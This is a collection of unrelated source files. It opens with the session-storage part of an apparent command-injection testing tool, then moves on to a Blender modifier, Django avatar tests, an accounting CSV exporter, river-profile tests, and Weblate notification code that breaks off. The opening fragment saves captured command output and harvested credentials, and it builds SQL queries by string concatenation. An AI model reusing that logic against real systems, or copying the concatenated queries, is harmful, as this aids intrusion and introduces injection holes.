""" def store_cmd(url, cmd, shell, vuln_parameter): try: conn = sqlite3.connect(settings.SESSION_FILE) conn.execute("CREATE TABLE IF NOT EXISTS " + table_name(url) + "_ir" + \ "(cmd VARCHAR, output VARCHAR, vuln_parameter VARCHAR);") if settings.TESTABLE_PARAMETER: conn.execute("INSERT INTO " + table_name(url) + "_ir(cmd, output, vuln_parameter) "\ "VALUES(?,?,?)", \ (str(base64.b64encode(cmd)), str(base64.b64encode(shell)), str(vuln_parameter))) else: conn.execute("INSERT INTO " + table_name(url) + "_ir(cmd, output, vuln_parameter) "\ "VALUES(?,?,?)", \ (str(base64.b64encode(cmd)), str(base64.b64encode(shell)), str(settings.HTTP_HEADER))) conn.commit() conn.close() except sqlite3.OperationalError, err_msg: print settings.print_critical_msg(err_msg) except TypeError, err_msg: pass """ Export successful command execution outputs from session file. """ def export_stored_cmd(url, cmd, vuln_parameter): try: if not menu.options.flush_session: conn = sqlite3.connect(settings.SESSION_FILE) output = None conn = sqlite3.connect(settings.SESSION_FILE) if settings.TESTABLE_PARAMETER: cursor = conn.execute("SELECT output FROM " + table_name(url) + \ "_ir WHERE cmd='" + base64.b64encode(cmd) + "' AND "\ "vuln_parameter= '" + vuln_parameter + "';").fetchall() else: cursor = conn.execute("SELECT output FROM " + table_name(url) + \ "_ir WHERE cmd='" + base64.b64encode(cmd) + "' AND "\ "vuln_parameter= '" + settings.HTTP_HEADER + "';").fetchall() conn.commit() conn.close() for session in cursor: output = base64.b64decode(session[0]) return output else: no_such_table = True pass except sqlite3.OperationalError, err_msg: pass """ Import valid credentials to session file. 
""" def import_valid_credentials(url, authentication_type, admin_panel, username, password): try: conn = sqlite3.connect(settings.SESSION_FILE) conn.execute("CREATE TABLE IF NOT EXISTS " + table_name(url) + "_creds" + \ "(id INTEGER PRIMARY KEY, url VARCHAR, authentication_type VARCHAR, admin_panel VARCHAR, "\ "username VARCHAR, password VARCHAR);") conn.execute("INSERT INTO " + table_name(url) + "_creds(url, authentication_type, "\ "admin_panel, username, password) VALUES(?,?,?,?,?)", \ (str(url), str(authentication_type), str(admin_panel), \ str(username), str(password))) conn.commit() conn.close() except sqlite3.OperationalError, err_msg: print settings.print_critical_msg(err_msg) except sqlite3.DatabaseError, err_msg: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "If the problem persists use the '--flush-session' option." print "\n" + settings.print_critical_msg(err_msg) sys.exit(0) """ Export valid credentials from session file. """ def export_valid_credentials(url, authentication_type): try: if not menu.options.flush_session: conn = sqlite3.connect(settings.SESSION_FILE) output = None conn = sqlite3.connect(settings.SESSION_FILE) cursor = conn.execute("SELECT username, password FROM " + table_name(url) + \ "_creds WHERE url='" + url + "' AND "\ "authentication_type= '" + authentication_type + "';").fetchall() cursor = ":".join(cursor[0]) return cursor else: no_such_table = True pass except sqlite3.OperationalError, err_msg: pass # eof
dpogue/korman
korman/properties/modifiers/logic.py
# This file is part of Korman. # # Korman is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Korman is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Korman. If not, see <http://www.gnu.org/licenses/>. import bpy from bpy.props import * from PyHSPlasma import * from .base import PlasmaModifierProperties from ..prop_world import game_versions from ...exporter import ExportError from ... import idprops class PlasmaVersionedNodeTree(idprops.IDPropMixin, bpy.types.PropertyGroup): name = StringProperty(name="Name") version = EnumProperty(name="Version", description="Plasma versions this node tree exports under", items=game_versions, options={"ENUM_FLAG"}, default=set(list(zip(*game_versions))[0])) node_tree = PointerProperty(name="Node Tree", description="Node Tree to export", type=bpy.types.NodeTree) node_name = StringProperty(name="Node Ref", description="Attach a reference to this node") @classmethod def _idprop_mapping(cls): return {"node_tree": "node_tree_name"} def _idprop_sources(self): return {"node_tree_name": bpy.data.node_groups} class PlasmaAdvancedLogic(PlasmaModifierProperties): pl_id = "advanced_logic" bl_category = "Logic" bl_label = "Advanced" bl_description = "Plasma Logic Nodes" bl_icon = "NODETREE" logic_groups = CollectionProperty(type=PlasmaVersionedNodeTree) active_group_index = IntProperty(options={"HIDDEN"}) def export(self, exporter, bo, so): version = exporter.mgr.getVer() for i in self.logic_groups: our_versions = [globals()[j] for j in i.version] if version in our_versions: if i.node_tree is None: raise 
ExportError("'{}': Advanced Logic is missing a node tree for '{}'".format(bo.name, i.version)) # If node_name is defined, then we're only adding a reference. We will make sure that # the entire node tree is exported once before the post_export step, however. if i.node_name: exporter.want_node_trees[i.node_tree.name] = (bo, so) node = i.node_tree.nodes.get(i.node_name, None) if node is None: raise ExportError("Node '{}' does not exist in '{}'".format(i.node_name, i.node_tree.name)) # We are going to assume get_key will do the adding correctly. Single modifiers # should fetch the appropriate SceneObject before doing anything, so this will # be a no-op in that case. Multi modifiers should accept any SceneObject, however node.get_key(exporter, so) else: exporter.node_trees_exported.add(i.node_tree.name) i.node_tree.export(exporter, bo, so) def harvest_actors(self): actors = set() for i in self.logic_groups: actors.update(i.node_tree.harvest_actors()) return actors class PlasmaSpawnPoint(PlasmaModifierProperties): pl_id = "spawnpoint" bl_category = "Logic" bl_label = "Spawn Point" bl_description = "Point at which avatars link into the Age" def export(self, exporter, bo, so): # Not much to this modifier... It's basically a flag that tells the engine, "hey, this is a # place the avatar can show up." Nice to have a simple one to get started with. spawn = exporter.mgr.add_object(pl=plSpawnModifier, so=so, name=self.key_name) @property def requires_actor(self): return True class PlasmaMaintainersMarker(PlasmaModifierProperties): pl_id = "maintainersmarker" bl_category = "Logic" bl_label = "Maintainer's Marker" bl_description = "Designates an object as the D'ni coordinate origin point of the Age." 
bl_icon = "OUTLINER_DATA_EMPTY" calibration = EnumProperty(name="Calibration", description="State of repair for the Marker", items=[ ("kBroken", "Broken", "A marker which reports scrambled coordinates to the KI."), ("kRepaired", "Repaired", "A marker which reports blank coordinates to the KI."), ("kCalibrated", "Calibrated", "A marker which reports accurate coordinates to the KI.") ]) def export(self, exporter, bo, so): maintmark = exporter.mgr.add_object(pl=plMaintainersMarkerModifier, so=so, name=self.key_name) maintmark.calibration = getattr(plMaintainersMarkerModifier, self.calibration) @property def requires_actor(self): return True
bhermansyah/DRR-datacenter
avatar/tests.py
import os.path from django.test import TestCase from django.core.urlresolvers import reverse from django.conf import settings from django.contrib.auth import get_user_model from avatar.settings import AVATAR_DEFAULT_URL, AVATAR_MAX_AVATARS_PER_USER from avatar.util import get_primary_avatar from avatar.models import Avatar try: from PIL import Image dir(Image) # Placate PyFlakes except ImportError: import Image def upload_helper(o, filename): f = open(os.path.join(o.testdatapath, filename), "rb") response = o.client.post(reverse('avatar_add'), { 'avatar': f, }, follow=True) f.close() return response class AvatarUploadTests(TestCase): def setUp(self): self.testdatapath = os.path.join(os.path.dirname(__file__), "testdata") self.user = get_user_model().objects.create_user('test', 'lennon@thebeatles.com', 'testpassword') self.user.save() self.client.login(username='test', password='testpassword') Image.init() def testNonImageUpload(self): response = upload_helper(self, "nonimagefile") self.failUnlessEqual(response.status_code, 200) self.failIfEqual(response.context['upload_avatar_form'].errors, {}) def testNormalImageUpload(self): response = upload_helper(self, "test.png") self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 1) self.failUnlessEqual(response.context['upload_avatar_form'].errors, {}) avatar = get_primary_avatar(self.user) self.failIfEqual(avatar, None) def testImageWithoutExtension(self): # use with AVATAR_ALLOWED_FILE_EXTS = ('.jpg', '.png') response = upload_helper(self, "imagefilewithoutext") self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 0) # Redirect only if it worked self.failIfEqual(response.context['upload_avatar_form'].errors, {}) def testImageWithWrongExtension(self): # use with AVATAR_ALLOWED_FILE_EXTS = ('.jpg', '.png') response = upload_helper(self, "imagefilewithwrongext.ogg") self.failUnlessEqual(response.status_code, 200) 
self.failUnlessEqual(len(response.redirect_chain), 0) # Redirect only if it worked self.failIfEqual(response.context['upload_avatar_form'].errors, {}) def testImageTooBig(self): # use with AVATAR_MAX_SIZE = 1024 * 1024 response = upload_helper(self, "testbig.png") self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 0) # Redirect only if it worked self.failIfEqual(response.context['upload_avatar_form'].errors, {}) def testDefaultUrl(self): response = self.client.get(reverse('avatar_render_primary', kwargs={ 'user': self.user.username, 'size': 80, })) loc = response['Location'] base_url = getattr(settings, 'STATIC_URL', None) if not base_url: base_url = settings.MEDIA_URL self.assertTrue(base_url in loc) self.assertTrue(loc.endswith(AVATAR_DEFAULT_URL)) def testNonExistingUser(self): a = get_primary_avatar("nonexistinguser") self.failUnlessEqual(a, None) def testThereCanBeOnlyOnePrimaryAvatar(self): for i in range(1, 10): self.testNormalImageUpload() count = Avatar.objects.filter(user=self.user, primary=True).count() self.failUnlessEqual(count, 1) def testDeleteAvatar(self): self.testNormalImageUpload() avatar = Avatar.objects.filter(user=self.user) self.failUnlessEqual(len(avatar), 1) response = self.client.post(reverse('avatar_delete'), { 'choices': [avatar[0].id], }, follow=True) self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 1) count = Avatar.objects.filter(user=self.user).count() self.failUnlessEqual(count, 0) def testDeletePrimaryAvatarAndNewPrimary(self): self.testThereCanBeOnlyOnePrimaryAvatar() primary = get_primary_avatar(self.user) oid = primary.id response = self.client.post(reverse('avatar_delete'), { 'choices': [oid], }) primaries = Avatar.objects.filter(user=self.user, primary=True) self.failUnlessEqual(len(primaries), 1) self.failIfEqual(oid, primaries[0].id) avatars = Avatar.objects.filter(user=self.user) self.failUnlessEqual(avatars[0].id, 
primaries[0].id) def testTooManyAvatars(self): for i in range(0, AVATAR_MAX_AVATARS_PER_USER): self.testNormalImageUpload() count_before = Avatar.objects.filter(user=self.user).count() response = upload_helper(self, "test.png") count_after = Avatar.objects.filter(user=self.user).count() self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 0) # Redirect only if it worked self.failIfEqual(response.context['upload_avatar_form'].errors, {}) self.failUnlessEqual(count_before, count_after) # def testAvatarOrder # def testReplaceAvatarWhenMaxIsOne # def testHashFileName # def testHashUserName # def testChangePrimaryAvatar # def testDeleteThumbnailAndRecreation # def testAutomaticThumbnailCreation
jswetzen/sie-parse
petra_output.py
#!/usr/bin/env python3 """Output a CSV file that can be imported to Petra""" import os import sys import calendar import csv from csv_dict import CSVDict, CSVKeyMissing def split_csv(table_file='Tabell.csv'): """Split account, cost center and project into three tables""" account = [] cost_center = [] project = [] with open(table_file, newline='') as tablefile: tablereader = csv.reader(tablefile, delimiter=';') for row in tablereader: if row[0] != '' and row[1] != '': account.append([row[0], row[1]]) if row[3] != '' and row[4] != '': cost_center.append([row[3], row[4]]) if row[6] != '' and row[7] != '': project.append([row[6], row[7]]) with open('Konto.csv', 'w', newline='') as accountfile: accountwriter = csv.writer(accountfile, delimiter=';') for row in account: accountwriter.writerow(row) with open('Costcenter.csv', 'w', newline='') as ccfile: ccwriter = csv.writer(ccfile, delimiter=';') for row in cost_center: ccwriter.writerow(row) with open('Projekt.csv', 'w', newline='') as projectfile: projectwriter = csv.writer(projectfile, delimiter=';') for row in project: projectwriter.writerow(row) def _parse_trans_objects(trans): """ Handle an object list of a transaction. The object list contains a cost center and project, formatted like so ['1', 'K0000', '6', 'P-00000000']. Cost center (resultatenhet) is preceeded by a '1' and project by a '6', but the order of the two could be reversed. Cost center always begins with 'K' and project with 'P-'. The object list could also be empty. Returns a tuple (cost_center, project), where any of the two could be None in case the information is missing from the object list. 
""" cost_center = project = None trans_it = iter(trans) for idx in trans_it: obj = next(trans_it) if idx == '1' and obj.startswith('K'): cost_center = obj elif idx == '6' and obj.startswith('P-'): project = obj return (cost_center, project) class PetraOutput: """Form an output file based on an SieData object and translation table""" def __init__(self, sie_data, account_file, cost_center_file, project_file, default_petra_cc='3200'): self.sie_data = sie_data self.default_petra_cc = default_petra_cc # self.parse_tables(account_file, cost_center_file, project_file) self.account = CSVDict(account_file) self.cost_center = CSVDict(cost_center_file) self.project = CSVDict(project_file) self.table = [] self.ver_month = None def populate_output_table(self): # pylint: disable=too-many-locals,too-many-branches,too-many-statements # pylint: disable=invalid-name """Extract interesting informatin from the Sie data and form output""" header = ['', 'CC', 'Account', 'Narrative', 'Reference', 'Date', 'Dt', 'Ct'] self.table.append(header) program = self.sie_data.get_data('#PROGRAM')[0].data[0].split()[0] verifications = self.sie_data.get_data('#VER') ver_date = next(v.verdatum for v in verifications if v.verdatum.has_date) self.ver_month = ver_date.format("%Y-%m") description = "Imported from {} {}".format(program, self.ver_month) checksum = format(sum(ver.sum_debit() for ver in verifications), '.2f').rstrip('0').rstrip('.').replace('.',',') day = calendar.monthrange(ver_date.year, ver_date.month)[1] last_date_month = "{}/{:02}/{}".format(day, ver_date.month, ver_date.year) self.table.append(['B', description, checksum, last_date_month, '', '', '', '']) for ver in verifications: if not ver.in_balance(): raise Exception('Inte i balans:', ver) """ # Contains 'Swetzén' if ver.serie == 'A' and ver.vernr == '170071': print(ver) # Contains stange characters if ver.serie == 'C' and ver.vernr == '170058': print(ver) # CC with 'XXXX' if ver.serie == 'C' and ver.vernr == '170064': print(ver) # 
Rounding error? if ver.serie == 'C' and ver.vernr == '170067': print(ver) """ ref = "Visma Ver {}{}".format(ver.serie, ver.vernr) text = "{} - {}".format(ref, ver.vertext) date = ver.verdatum.format("%d/%m/%Y") self.table.append(['J', text, 'GL', 'STD', 'SEK', '1', date, '']) narr = ver.vertext # Default for trans in ver.trans_list: (visma_cc, visma_proj) = _parse_trans_objects(trans.objekt) if not visma_proj or visma_proj == 'P-32000000': # Use visma_cc instead if not visma_cc: # Use default cc = self.default_petra_cc else: cc = self.cost_center[str(visma_cc)]['P_CC'] else: cc = self.project[str(visma_proj)]['P_CC'] acct = self.account[str(trans.kontonr)]['P_Acct'] if trans.transtext and trans.kvantitet: kvantitet = format(trans.kvantitet, '.2f').rstrip('0').rstrip('.').replace('.',',') narr = "{} {}".format(trans.transtext, kvantitet) elif trans.transtext: narr = trans.transtext dt = trans.debit ct = trans.credit self.table.append(['T', cc, acct, narr, ref, date, dt, ct]) def print_output(self): """Print csv output to stdout""" print("\n".join(','.join(str(r) for r in row) for row in self.table)) def write_output(self, filename=None, overwrite=False): """Write csv to file, abort if it already exists""" writemode = 'w' if overwrite else 'x' try: for encoding in ['utf_8']: if not filename: filename = 'CSV/PYTHON/VtP_' + self.ver_month + encoding + '.csv' try: with open(filename, writemode, newline='', encoding=encoding) as csvfile: csvwriter = csv.writer(csvfile, delimiter=';') csvwriter.writerows(self.table) # print("Encoding with ", encoding, "successful!") except UnicodeEncodeError as err: print("Encoding failed: ", err) os.remove(filename) except FileExistsError: sys.exit("Kan inte skriva " + filename + ", filen finns redan.")
geolovic/TProfiler
test/06_TProfiler_test.py
# -*- coding: utf-8 -*- """ José Vicente Pérez Granada University (Spain) March, 2017 Testing suite for profiler.py Last modified: 19 June 2017 """ import time import profiler as p import praster as pr import numpy as np import matplotlib.pyplot as plt print("Tests for TProfiler methods") def test01(): """ Creates a TProfiler from an array with profile_data Test for get_x, get_y """ inicio = time.time() print("=" * 40) print("Test 01 para TProfiler") print("Testing functions get_x(), get_y()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Test 01 get and print x and y arrays fig = plt.figure() ax1 = fig.add_subplot(121) ax2 = fig.add_subplot(122) xi1 = perfil.get_x(True) yi1 = perfil.get_y(True) xi2 = perfil.get_x(False) yi2 = perfil.get_y(False) ax1.plot(xi1, yi1) ax2.plot(xi2, yi2) ax1.set_title("head = True") ax2.set_title("head = False") fig.tight_layout() plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test02(): """ Creates a TProfiler from an array with profile_data Test for get_l, get_z """ inicio = time.time() print("=" * 40) print("Test 02 para TProfiler") print("Testing functions get_l(), get_z()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Test 01 get and print x and y arrays fig = plt.figure() ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) li1 = perfil.get_l(True) zi1 = perfil.get_z(True) ax1.plot(li1, zi1) ax1.set_title("head = True") li2 = perfil.get_l(False) zi2 = 
perfil.get_z(False) ax2.plot(li2, zi2) ax2.set_title("head = False") zi3 = perfil.get_z(True, True) ax3.plot(li1, zi3) ax3.set_title("Relative elevations, head = True") zi4 = perfil.get_z(False, True) ax4.plot(li2, zi4) ax4.set_title("Relative elevations, head = False") fig.tight_layout() plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test03(): """ Creates a TProfiler from an array with profile_data Test for raw_elevations and smooth """ inicio = time.time() print("=" * 40) print("Test 03 para TProfiler") print("Testing functions smooth() and get_raw_z()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Print raw elevations vs peaks removed elevations fig = plt.figure(figsize=(12, 6)) ax1 = fig.add_subplot(121) ax2 = fig.add_subplot(122) li = perfil.get_l(True) zi = perfil.get_z(True) raw_zi = perfil.get_raw_z(True) ax1.plot(li, zi, label="Peaks removed") ax1.plot(li, raw_zi, label="Raw elevations") ax1.set_title("Raw elevations vs peak removed") ax1.legend() ax1.set_xlim((6850, 8950)) ax1.set_ylim((950, 1050)) # Test for smooth function distance = 0 for n in range(5): li = perfil.get_l(True) zi = perfil.get_z(True) perfil.smooth(distance) ax2.plot(li, zi, label=str(distance) + " m") distance += 50 ax2.set_title("Smooth with different distances") ax2.legend() ax2.set_xlim((8000, 9000)) ax2.set_ylim((950, 1000)) fig.tight_layout() plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test04(): """ Creates a TProfiler from an array with profile_data Test for get_area and get_slopes """ inicio = time.time() print("=" * 40) print("Test 04 para TProfiler") print("Testing functions get_area() and get_slopes()") print("Test in 
progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Get slope area and plot in log scale fig = plt.figure(figsize=(12, 6)) ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) for ax in (ax1, ax2, ax3, ax4): ax.set_xscale("log") ax.set_yscale("log") ax.set_xlim((1000000, 100000000)) ax.set_ylim((0.001, 1)) ai = perfil.get_area(True) s1 = perfil.get_slope() ax1.plot(ai, s1, "b+") ax1.set_title("Raw slopes (all)") s2 = perfil.get_slope(threshold=0.9) ax2.plot(ai, s2, "b+") ax2.set_title("Slopes with threshold >= 0.9") s3, lq3 = perfil.get_slope(threshold=0.9, lq=True) ax3.plot(ai, lq3, "r+") ax3.plot(ai, s3, "b+") ax3.set_title("Slopes and low quality slopes (threshold 0.9)") s4, lq4 = perfil.get_slope(threshold=0.9, lq=True, head=True) a2 = perfil.get_area(head=True) ax4.plot(a2, lq4, "r+") ax4.plot(a2, s4, "b+") ax4.set_title("Example 3 with head=True") fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test05(): """ Creates a TProfiler from an array with profile_data Test for calculate slopes """ inicio = time.time() print("=" * 40) print("Test 05 para TProfiler") print("Testing functions calculate slopes") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) reg_points = 4 # Get slope area and plot in log scale fig = plt.figure(figsize=(12, 6)) for n in range(1, 9, 2): ax1 = fig.add_subplot(4, 2, n) ax2 = fig.add_subplot(4, 2, n+1) perfil.calculate_slope(reg_points) si = perfil.get_slope() ai = 
perfil.get_area() ax1.plot(ai, si, "b+") ax1.set_xscale("log") ax1.set_yscale("log") ax1.set_xlim((1000000, 100000000)) ax1.set_ylim((0.001, 1)) ax1.set_title("reg_points = " + str(reg_points) + " (normal elevations)") perfil.calculate_slope(reg_points, True) si = perfil.get_slope(0.9) ax2.plot(ai, si, "b+") ax2.set_xscale("log") ax2.set_yscale("log") ax2.set_xlim((1000000, 100000000)) ax2.set_ylim((0.001, 1)) ax2.set_title("reg_points = " + str(reg_points) + " (raw elevations)") reg_points += 4 fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test06(): """ Creates a TProfiler from an array with profile_data Test for calculate_chi() and get_chi() """ inicio = time.time() print("=" * 40) print("Test 06 para TProfiler") print("Testing functions get_chi() and calculate_chi()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Get slope area and plot in log scale fig = plt.figure() theta = 0.35 for n in range(1, 10): ax = fig.add_subplot(3, 3, n) perfil.thetaref = theta perfil.calculate_chi() chi = perfil.get_chi(False, True) zi = perfil.get_z(False, True) ax.plot(chi, zi) ax.set_title("Thetaref = {0:.2f}".format(theta)) theta += 0.05 fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test07(): """ Creates a TProfiler from an array with profile_data Test for get_ksn() """ inicio = time.time() print("=" * 40) print("Test 07 para TProfiler") print("Testing function get_ksn()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # 
Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Get slope area and plot in log scale fig = plt.figure(figsize=(12, 6)) ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) li = perfil.get_l(True) ksn1 = perfil.get_ksn() ax1.plot(li, ksn1, "b+") ax1.set_title("Raw ksn (all)") ksn2 = perfil.get_ksn(threshold=0.9) ax2.plot(li, ksn2, "b+") ax2.set_title("Ksn with threshold >= 0.9") ksn3, lq3 = perfil.get_ksn(threshold=0.9, lq=True) ax3.plot(li, lq3, "r+") ax3.plot(li, ksn3, "b+") ax3.set_title("Ksn and low quality ksn (threshold 0.9)") ksn4, lq4 = perfil.get_ksn(threshold=0.9, lq=True, head=False) l2 = perfil.get_l(head=False) ax4.plot(l2, lq4, "r+") ax4.plot(l2, ksn4, "b+") ax4.set_title("Example 3 with head=False") fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test08(): """ Creates a TProfiler from an array with profile_data Test for calculate_ksn """ inicio = time.time() print("=" * 40) print("Test 08 para TProfiler") print("Testing functions calculate_ksn()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) reg_points = 4 fig = plt.figure(figsize=(12, 6)) for n in range(1, 9, 2): ax1 = fig.add_subplot(4, 2, n) ax2 = fig.add_subplot(4, 2, n + 1) perfil.calculate_ksn(reg_points) ksn = perfil.get_ksn() li = perfil.get_l() ax1.plot(li, ksn) ax1.set_title("KSN with reg_points = " + str(reg_points) + " (normal elevations)") perfil.calculate_ksn(reg_points, raw_z=True) ksn = perfil.get_ksn() ax2.plot(li, ksn) ax2.set_title("KSN with reg_points = " + str(reg_points) + " (raw elevations)") reg_points += 4 fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + 
str(fin - inicio) + " segundos") print("=" * 40) def test09(): """ Creates a TProfiler from an array with profile_data Test for calculate_ksn """ inicio = time.time() print("=" * 40) print("Test 09 para TProfiler") print("Testing ksn and SL plots") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) reg_points = 12 fig = plt.figure() ax = fig.add_subplot(111) perfil.calculate_ksn(reg_points=reg_points) perfil.calculate_slope(reg_points=reg_points) li = perfil.get_l() slope = perfil.get_slope() ksn = perfil.get_ksn() sl = slope * li sl, = ax.plot(li, sl) ax.set_ylabel("SL index") ax.set_xlabel("Distance (m)") twax = ax.twinx() ksn, = twax.plot(li, ksn, color="r") twax.set_ylabel("Ksn index") twax.legend((sl, ksn), ("SL", "ksn")) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) test01() test02() test03() test04() test05() test06() test07() test08() test09()
quinox/weblate
weblate/accounts/models.py
# -*- coding: utf-8 -*- # # Copyright © 2012 - 2015 Michal Čihař <michal@cihar.com> # # This file is part of Weblate <http://weblate.org/> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import os import sys import binascii from smtplib import SMTPException from django.db import models from django.dispatch import receiver from django.conf import settings from django.contrib.auth.signals import user_logged_in from django.db.models.signals import post_save, post_migrate from django.utils.translation import ugettext_lazy as _ from django.contrib.auth.models import Group, User, Permission from django.utils import translation as django_translation from django.template.loader import render_to_string from django.core.mail import EmailMultiAlternatives, get_connection from django.utils.translation import LANGUAGE_SESSION_KEY from social.apps.django_app.default.models import UserSocialAuth from weblate.lang.models import Language from weblate.trans.site import get_site_url, get_site_domain from weblate.accounts.avatar import get_user_display from weblate.trans.util import report_error from weblate.trans.signals import user_pre_delete from weblate import VERSION from weblate.logger import LOGGER from weblate.appsettings import ANONYMOUS_USER_NAME, SITE_TITLE def send_mails(mails): """Sends multiple mails in single connection.""" try: connection = get_connection() connection.send_messages(mails) 
except SMTPException as error: LOGGER.error('Failed to send email: %s', error) report_error(error, sys.exc_info()) def get_author_name(user, email=True): """Returns formatted author name with email.""" # Get full name from database full_name = user.first_name # Use username if full name is empty if full_name == '': full_name = user.username # Add email if we are asked for it if not email: return full_name return '%s <%s>' % (full_name, user.email) def notify_merge_failure(subproject, error, status): ''' Notification on merge failure. ''' subscriptions = Profile.objects.subscribed_merge_failure( subproject.project, ) users = set() mails = [] for subscription in subscriptions: mails.append( subscription.notify_merge_failure(subproject, error, status) ) users.add(subscription.user_id) for owner in subproject.project.owners.all(): mails.append( owner.profile.notify_merge_failure( subproject, error, status ) ) # Notify admins mails.append( get_notification_email( 'en', 'ADMINS', 'merge_failure', subproject, { 'subproject': subproject, 'status': status, 'error': error, } ) ) send_mails(mails) def notify_new_string(translation): ''' Notification on new string to translate. 
''' mails = [] subscriptions = Profile.objects.subscribed_new_string( translation.subproject.project, translation.language ) for subscription in subscriptions: mails.append( subscription.notify_new_string(translation) ) send_mails(mails) def notify_new_language(subproject, language, user): ''' Notify subscribed users about new language requests ''' mails = [] subscriptions = Profile.objects.subscribed_new_language( subproject.project, user ) users = set() for subscription in subscriptions: mails.append( subscription.notify_new_language(subproject, language, user) ) users.add(subscription.user_id) for owner in subproject.project.owners.all(): mails.append( owner.profile.notify_new_language( subproject, language, user ) ) # Notify admins mails.append( get_notification_email( 'en', 'ADMINS', 'new_language', subproject, { 'language': language, 'user': user, }, user=user, ) ) send_mails(mails) def notify_new_translation(unit, oldunit, user): ''' Notify subscribed users about new translation ''' mails = [] subscriptions = Profile.objects.subscribed_any_translation( unit.translation.subproject.project, unit.translation.language, user ) for subscription in subscriptions: mails.append( subscription.notify_any_translation(unit, oldunit) ) send_mails(mails) def notify_new_contributor(unit, user): ''' Notify about new contributor. ''' mails = [] subscriptions = Profile.objects.subscribed_new_contributor( unit.translation.subproject.project, unit.translation.language, user ) for subscription in subscriptions: mails.append( subscription.notify_new_contributor( unit.translation, user ) ) send_mails(mails) def notify_new_suggestion(unit, suggestion, user): ''' Notify about new suggestion. 
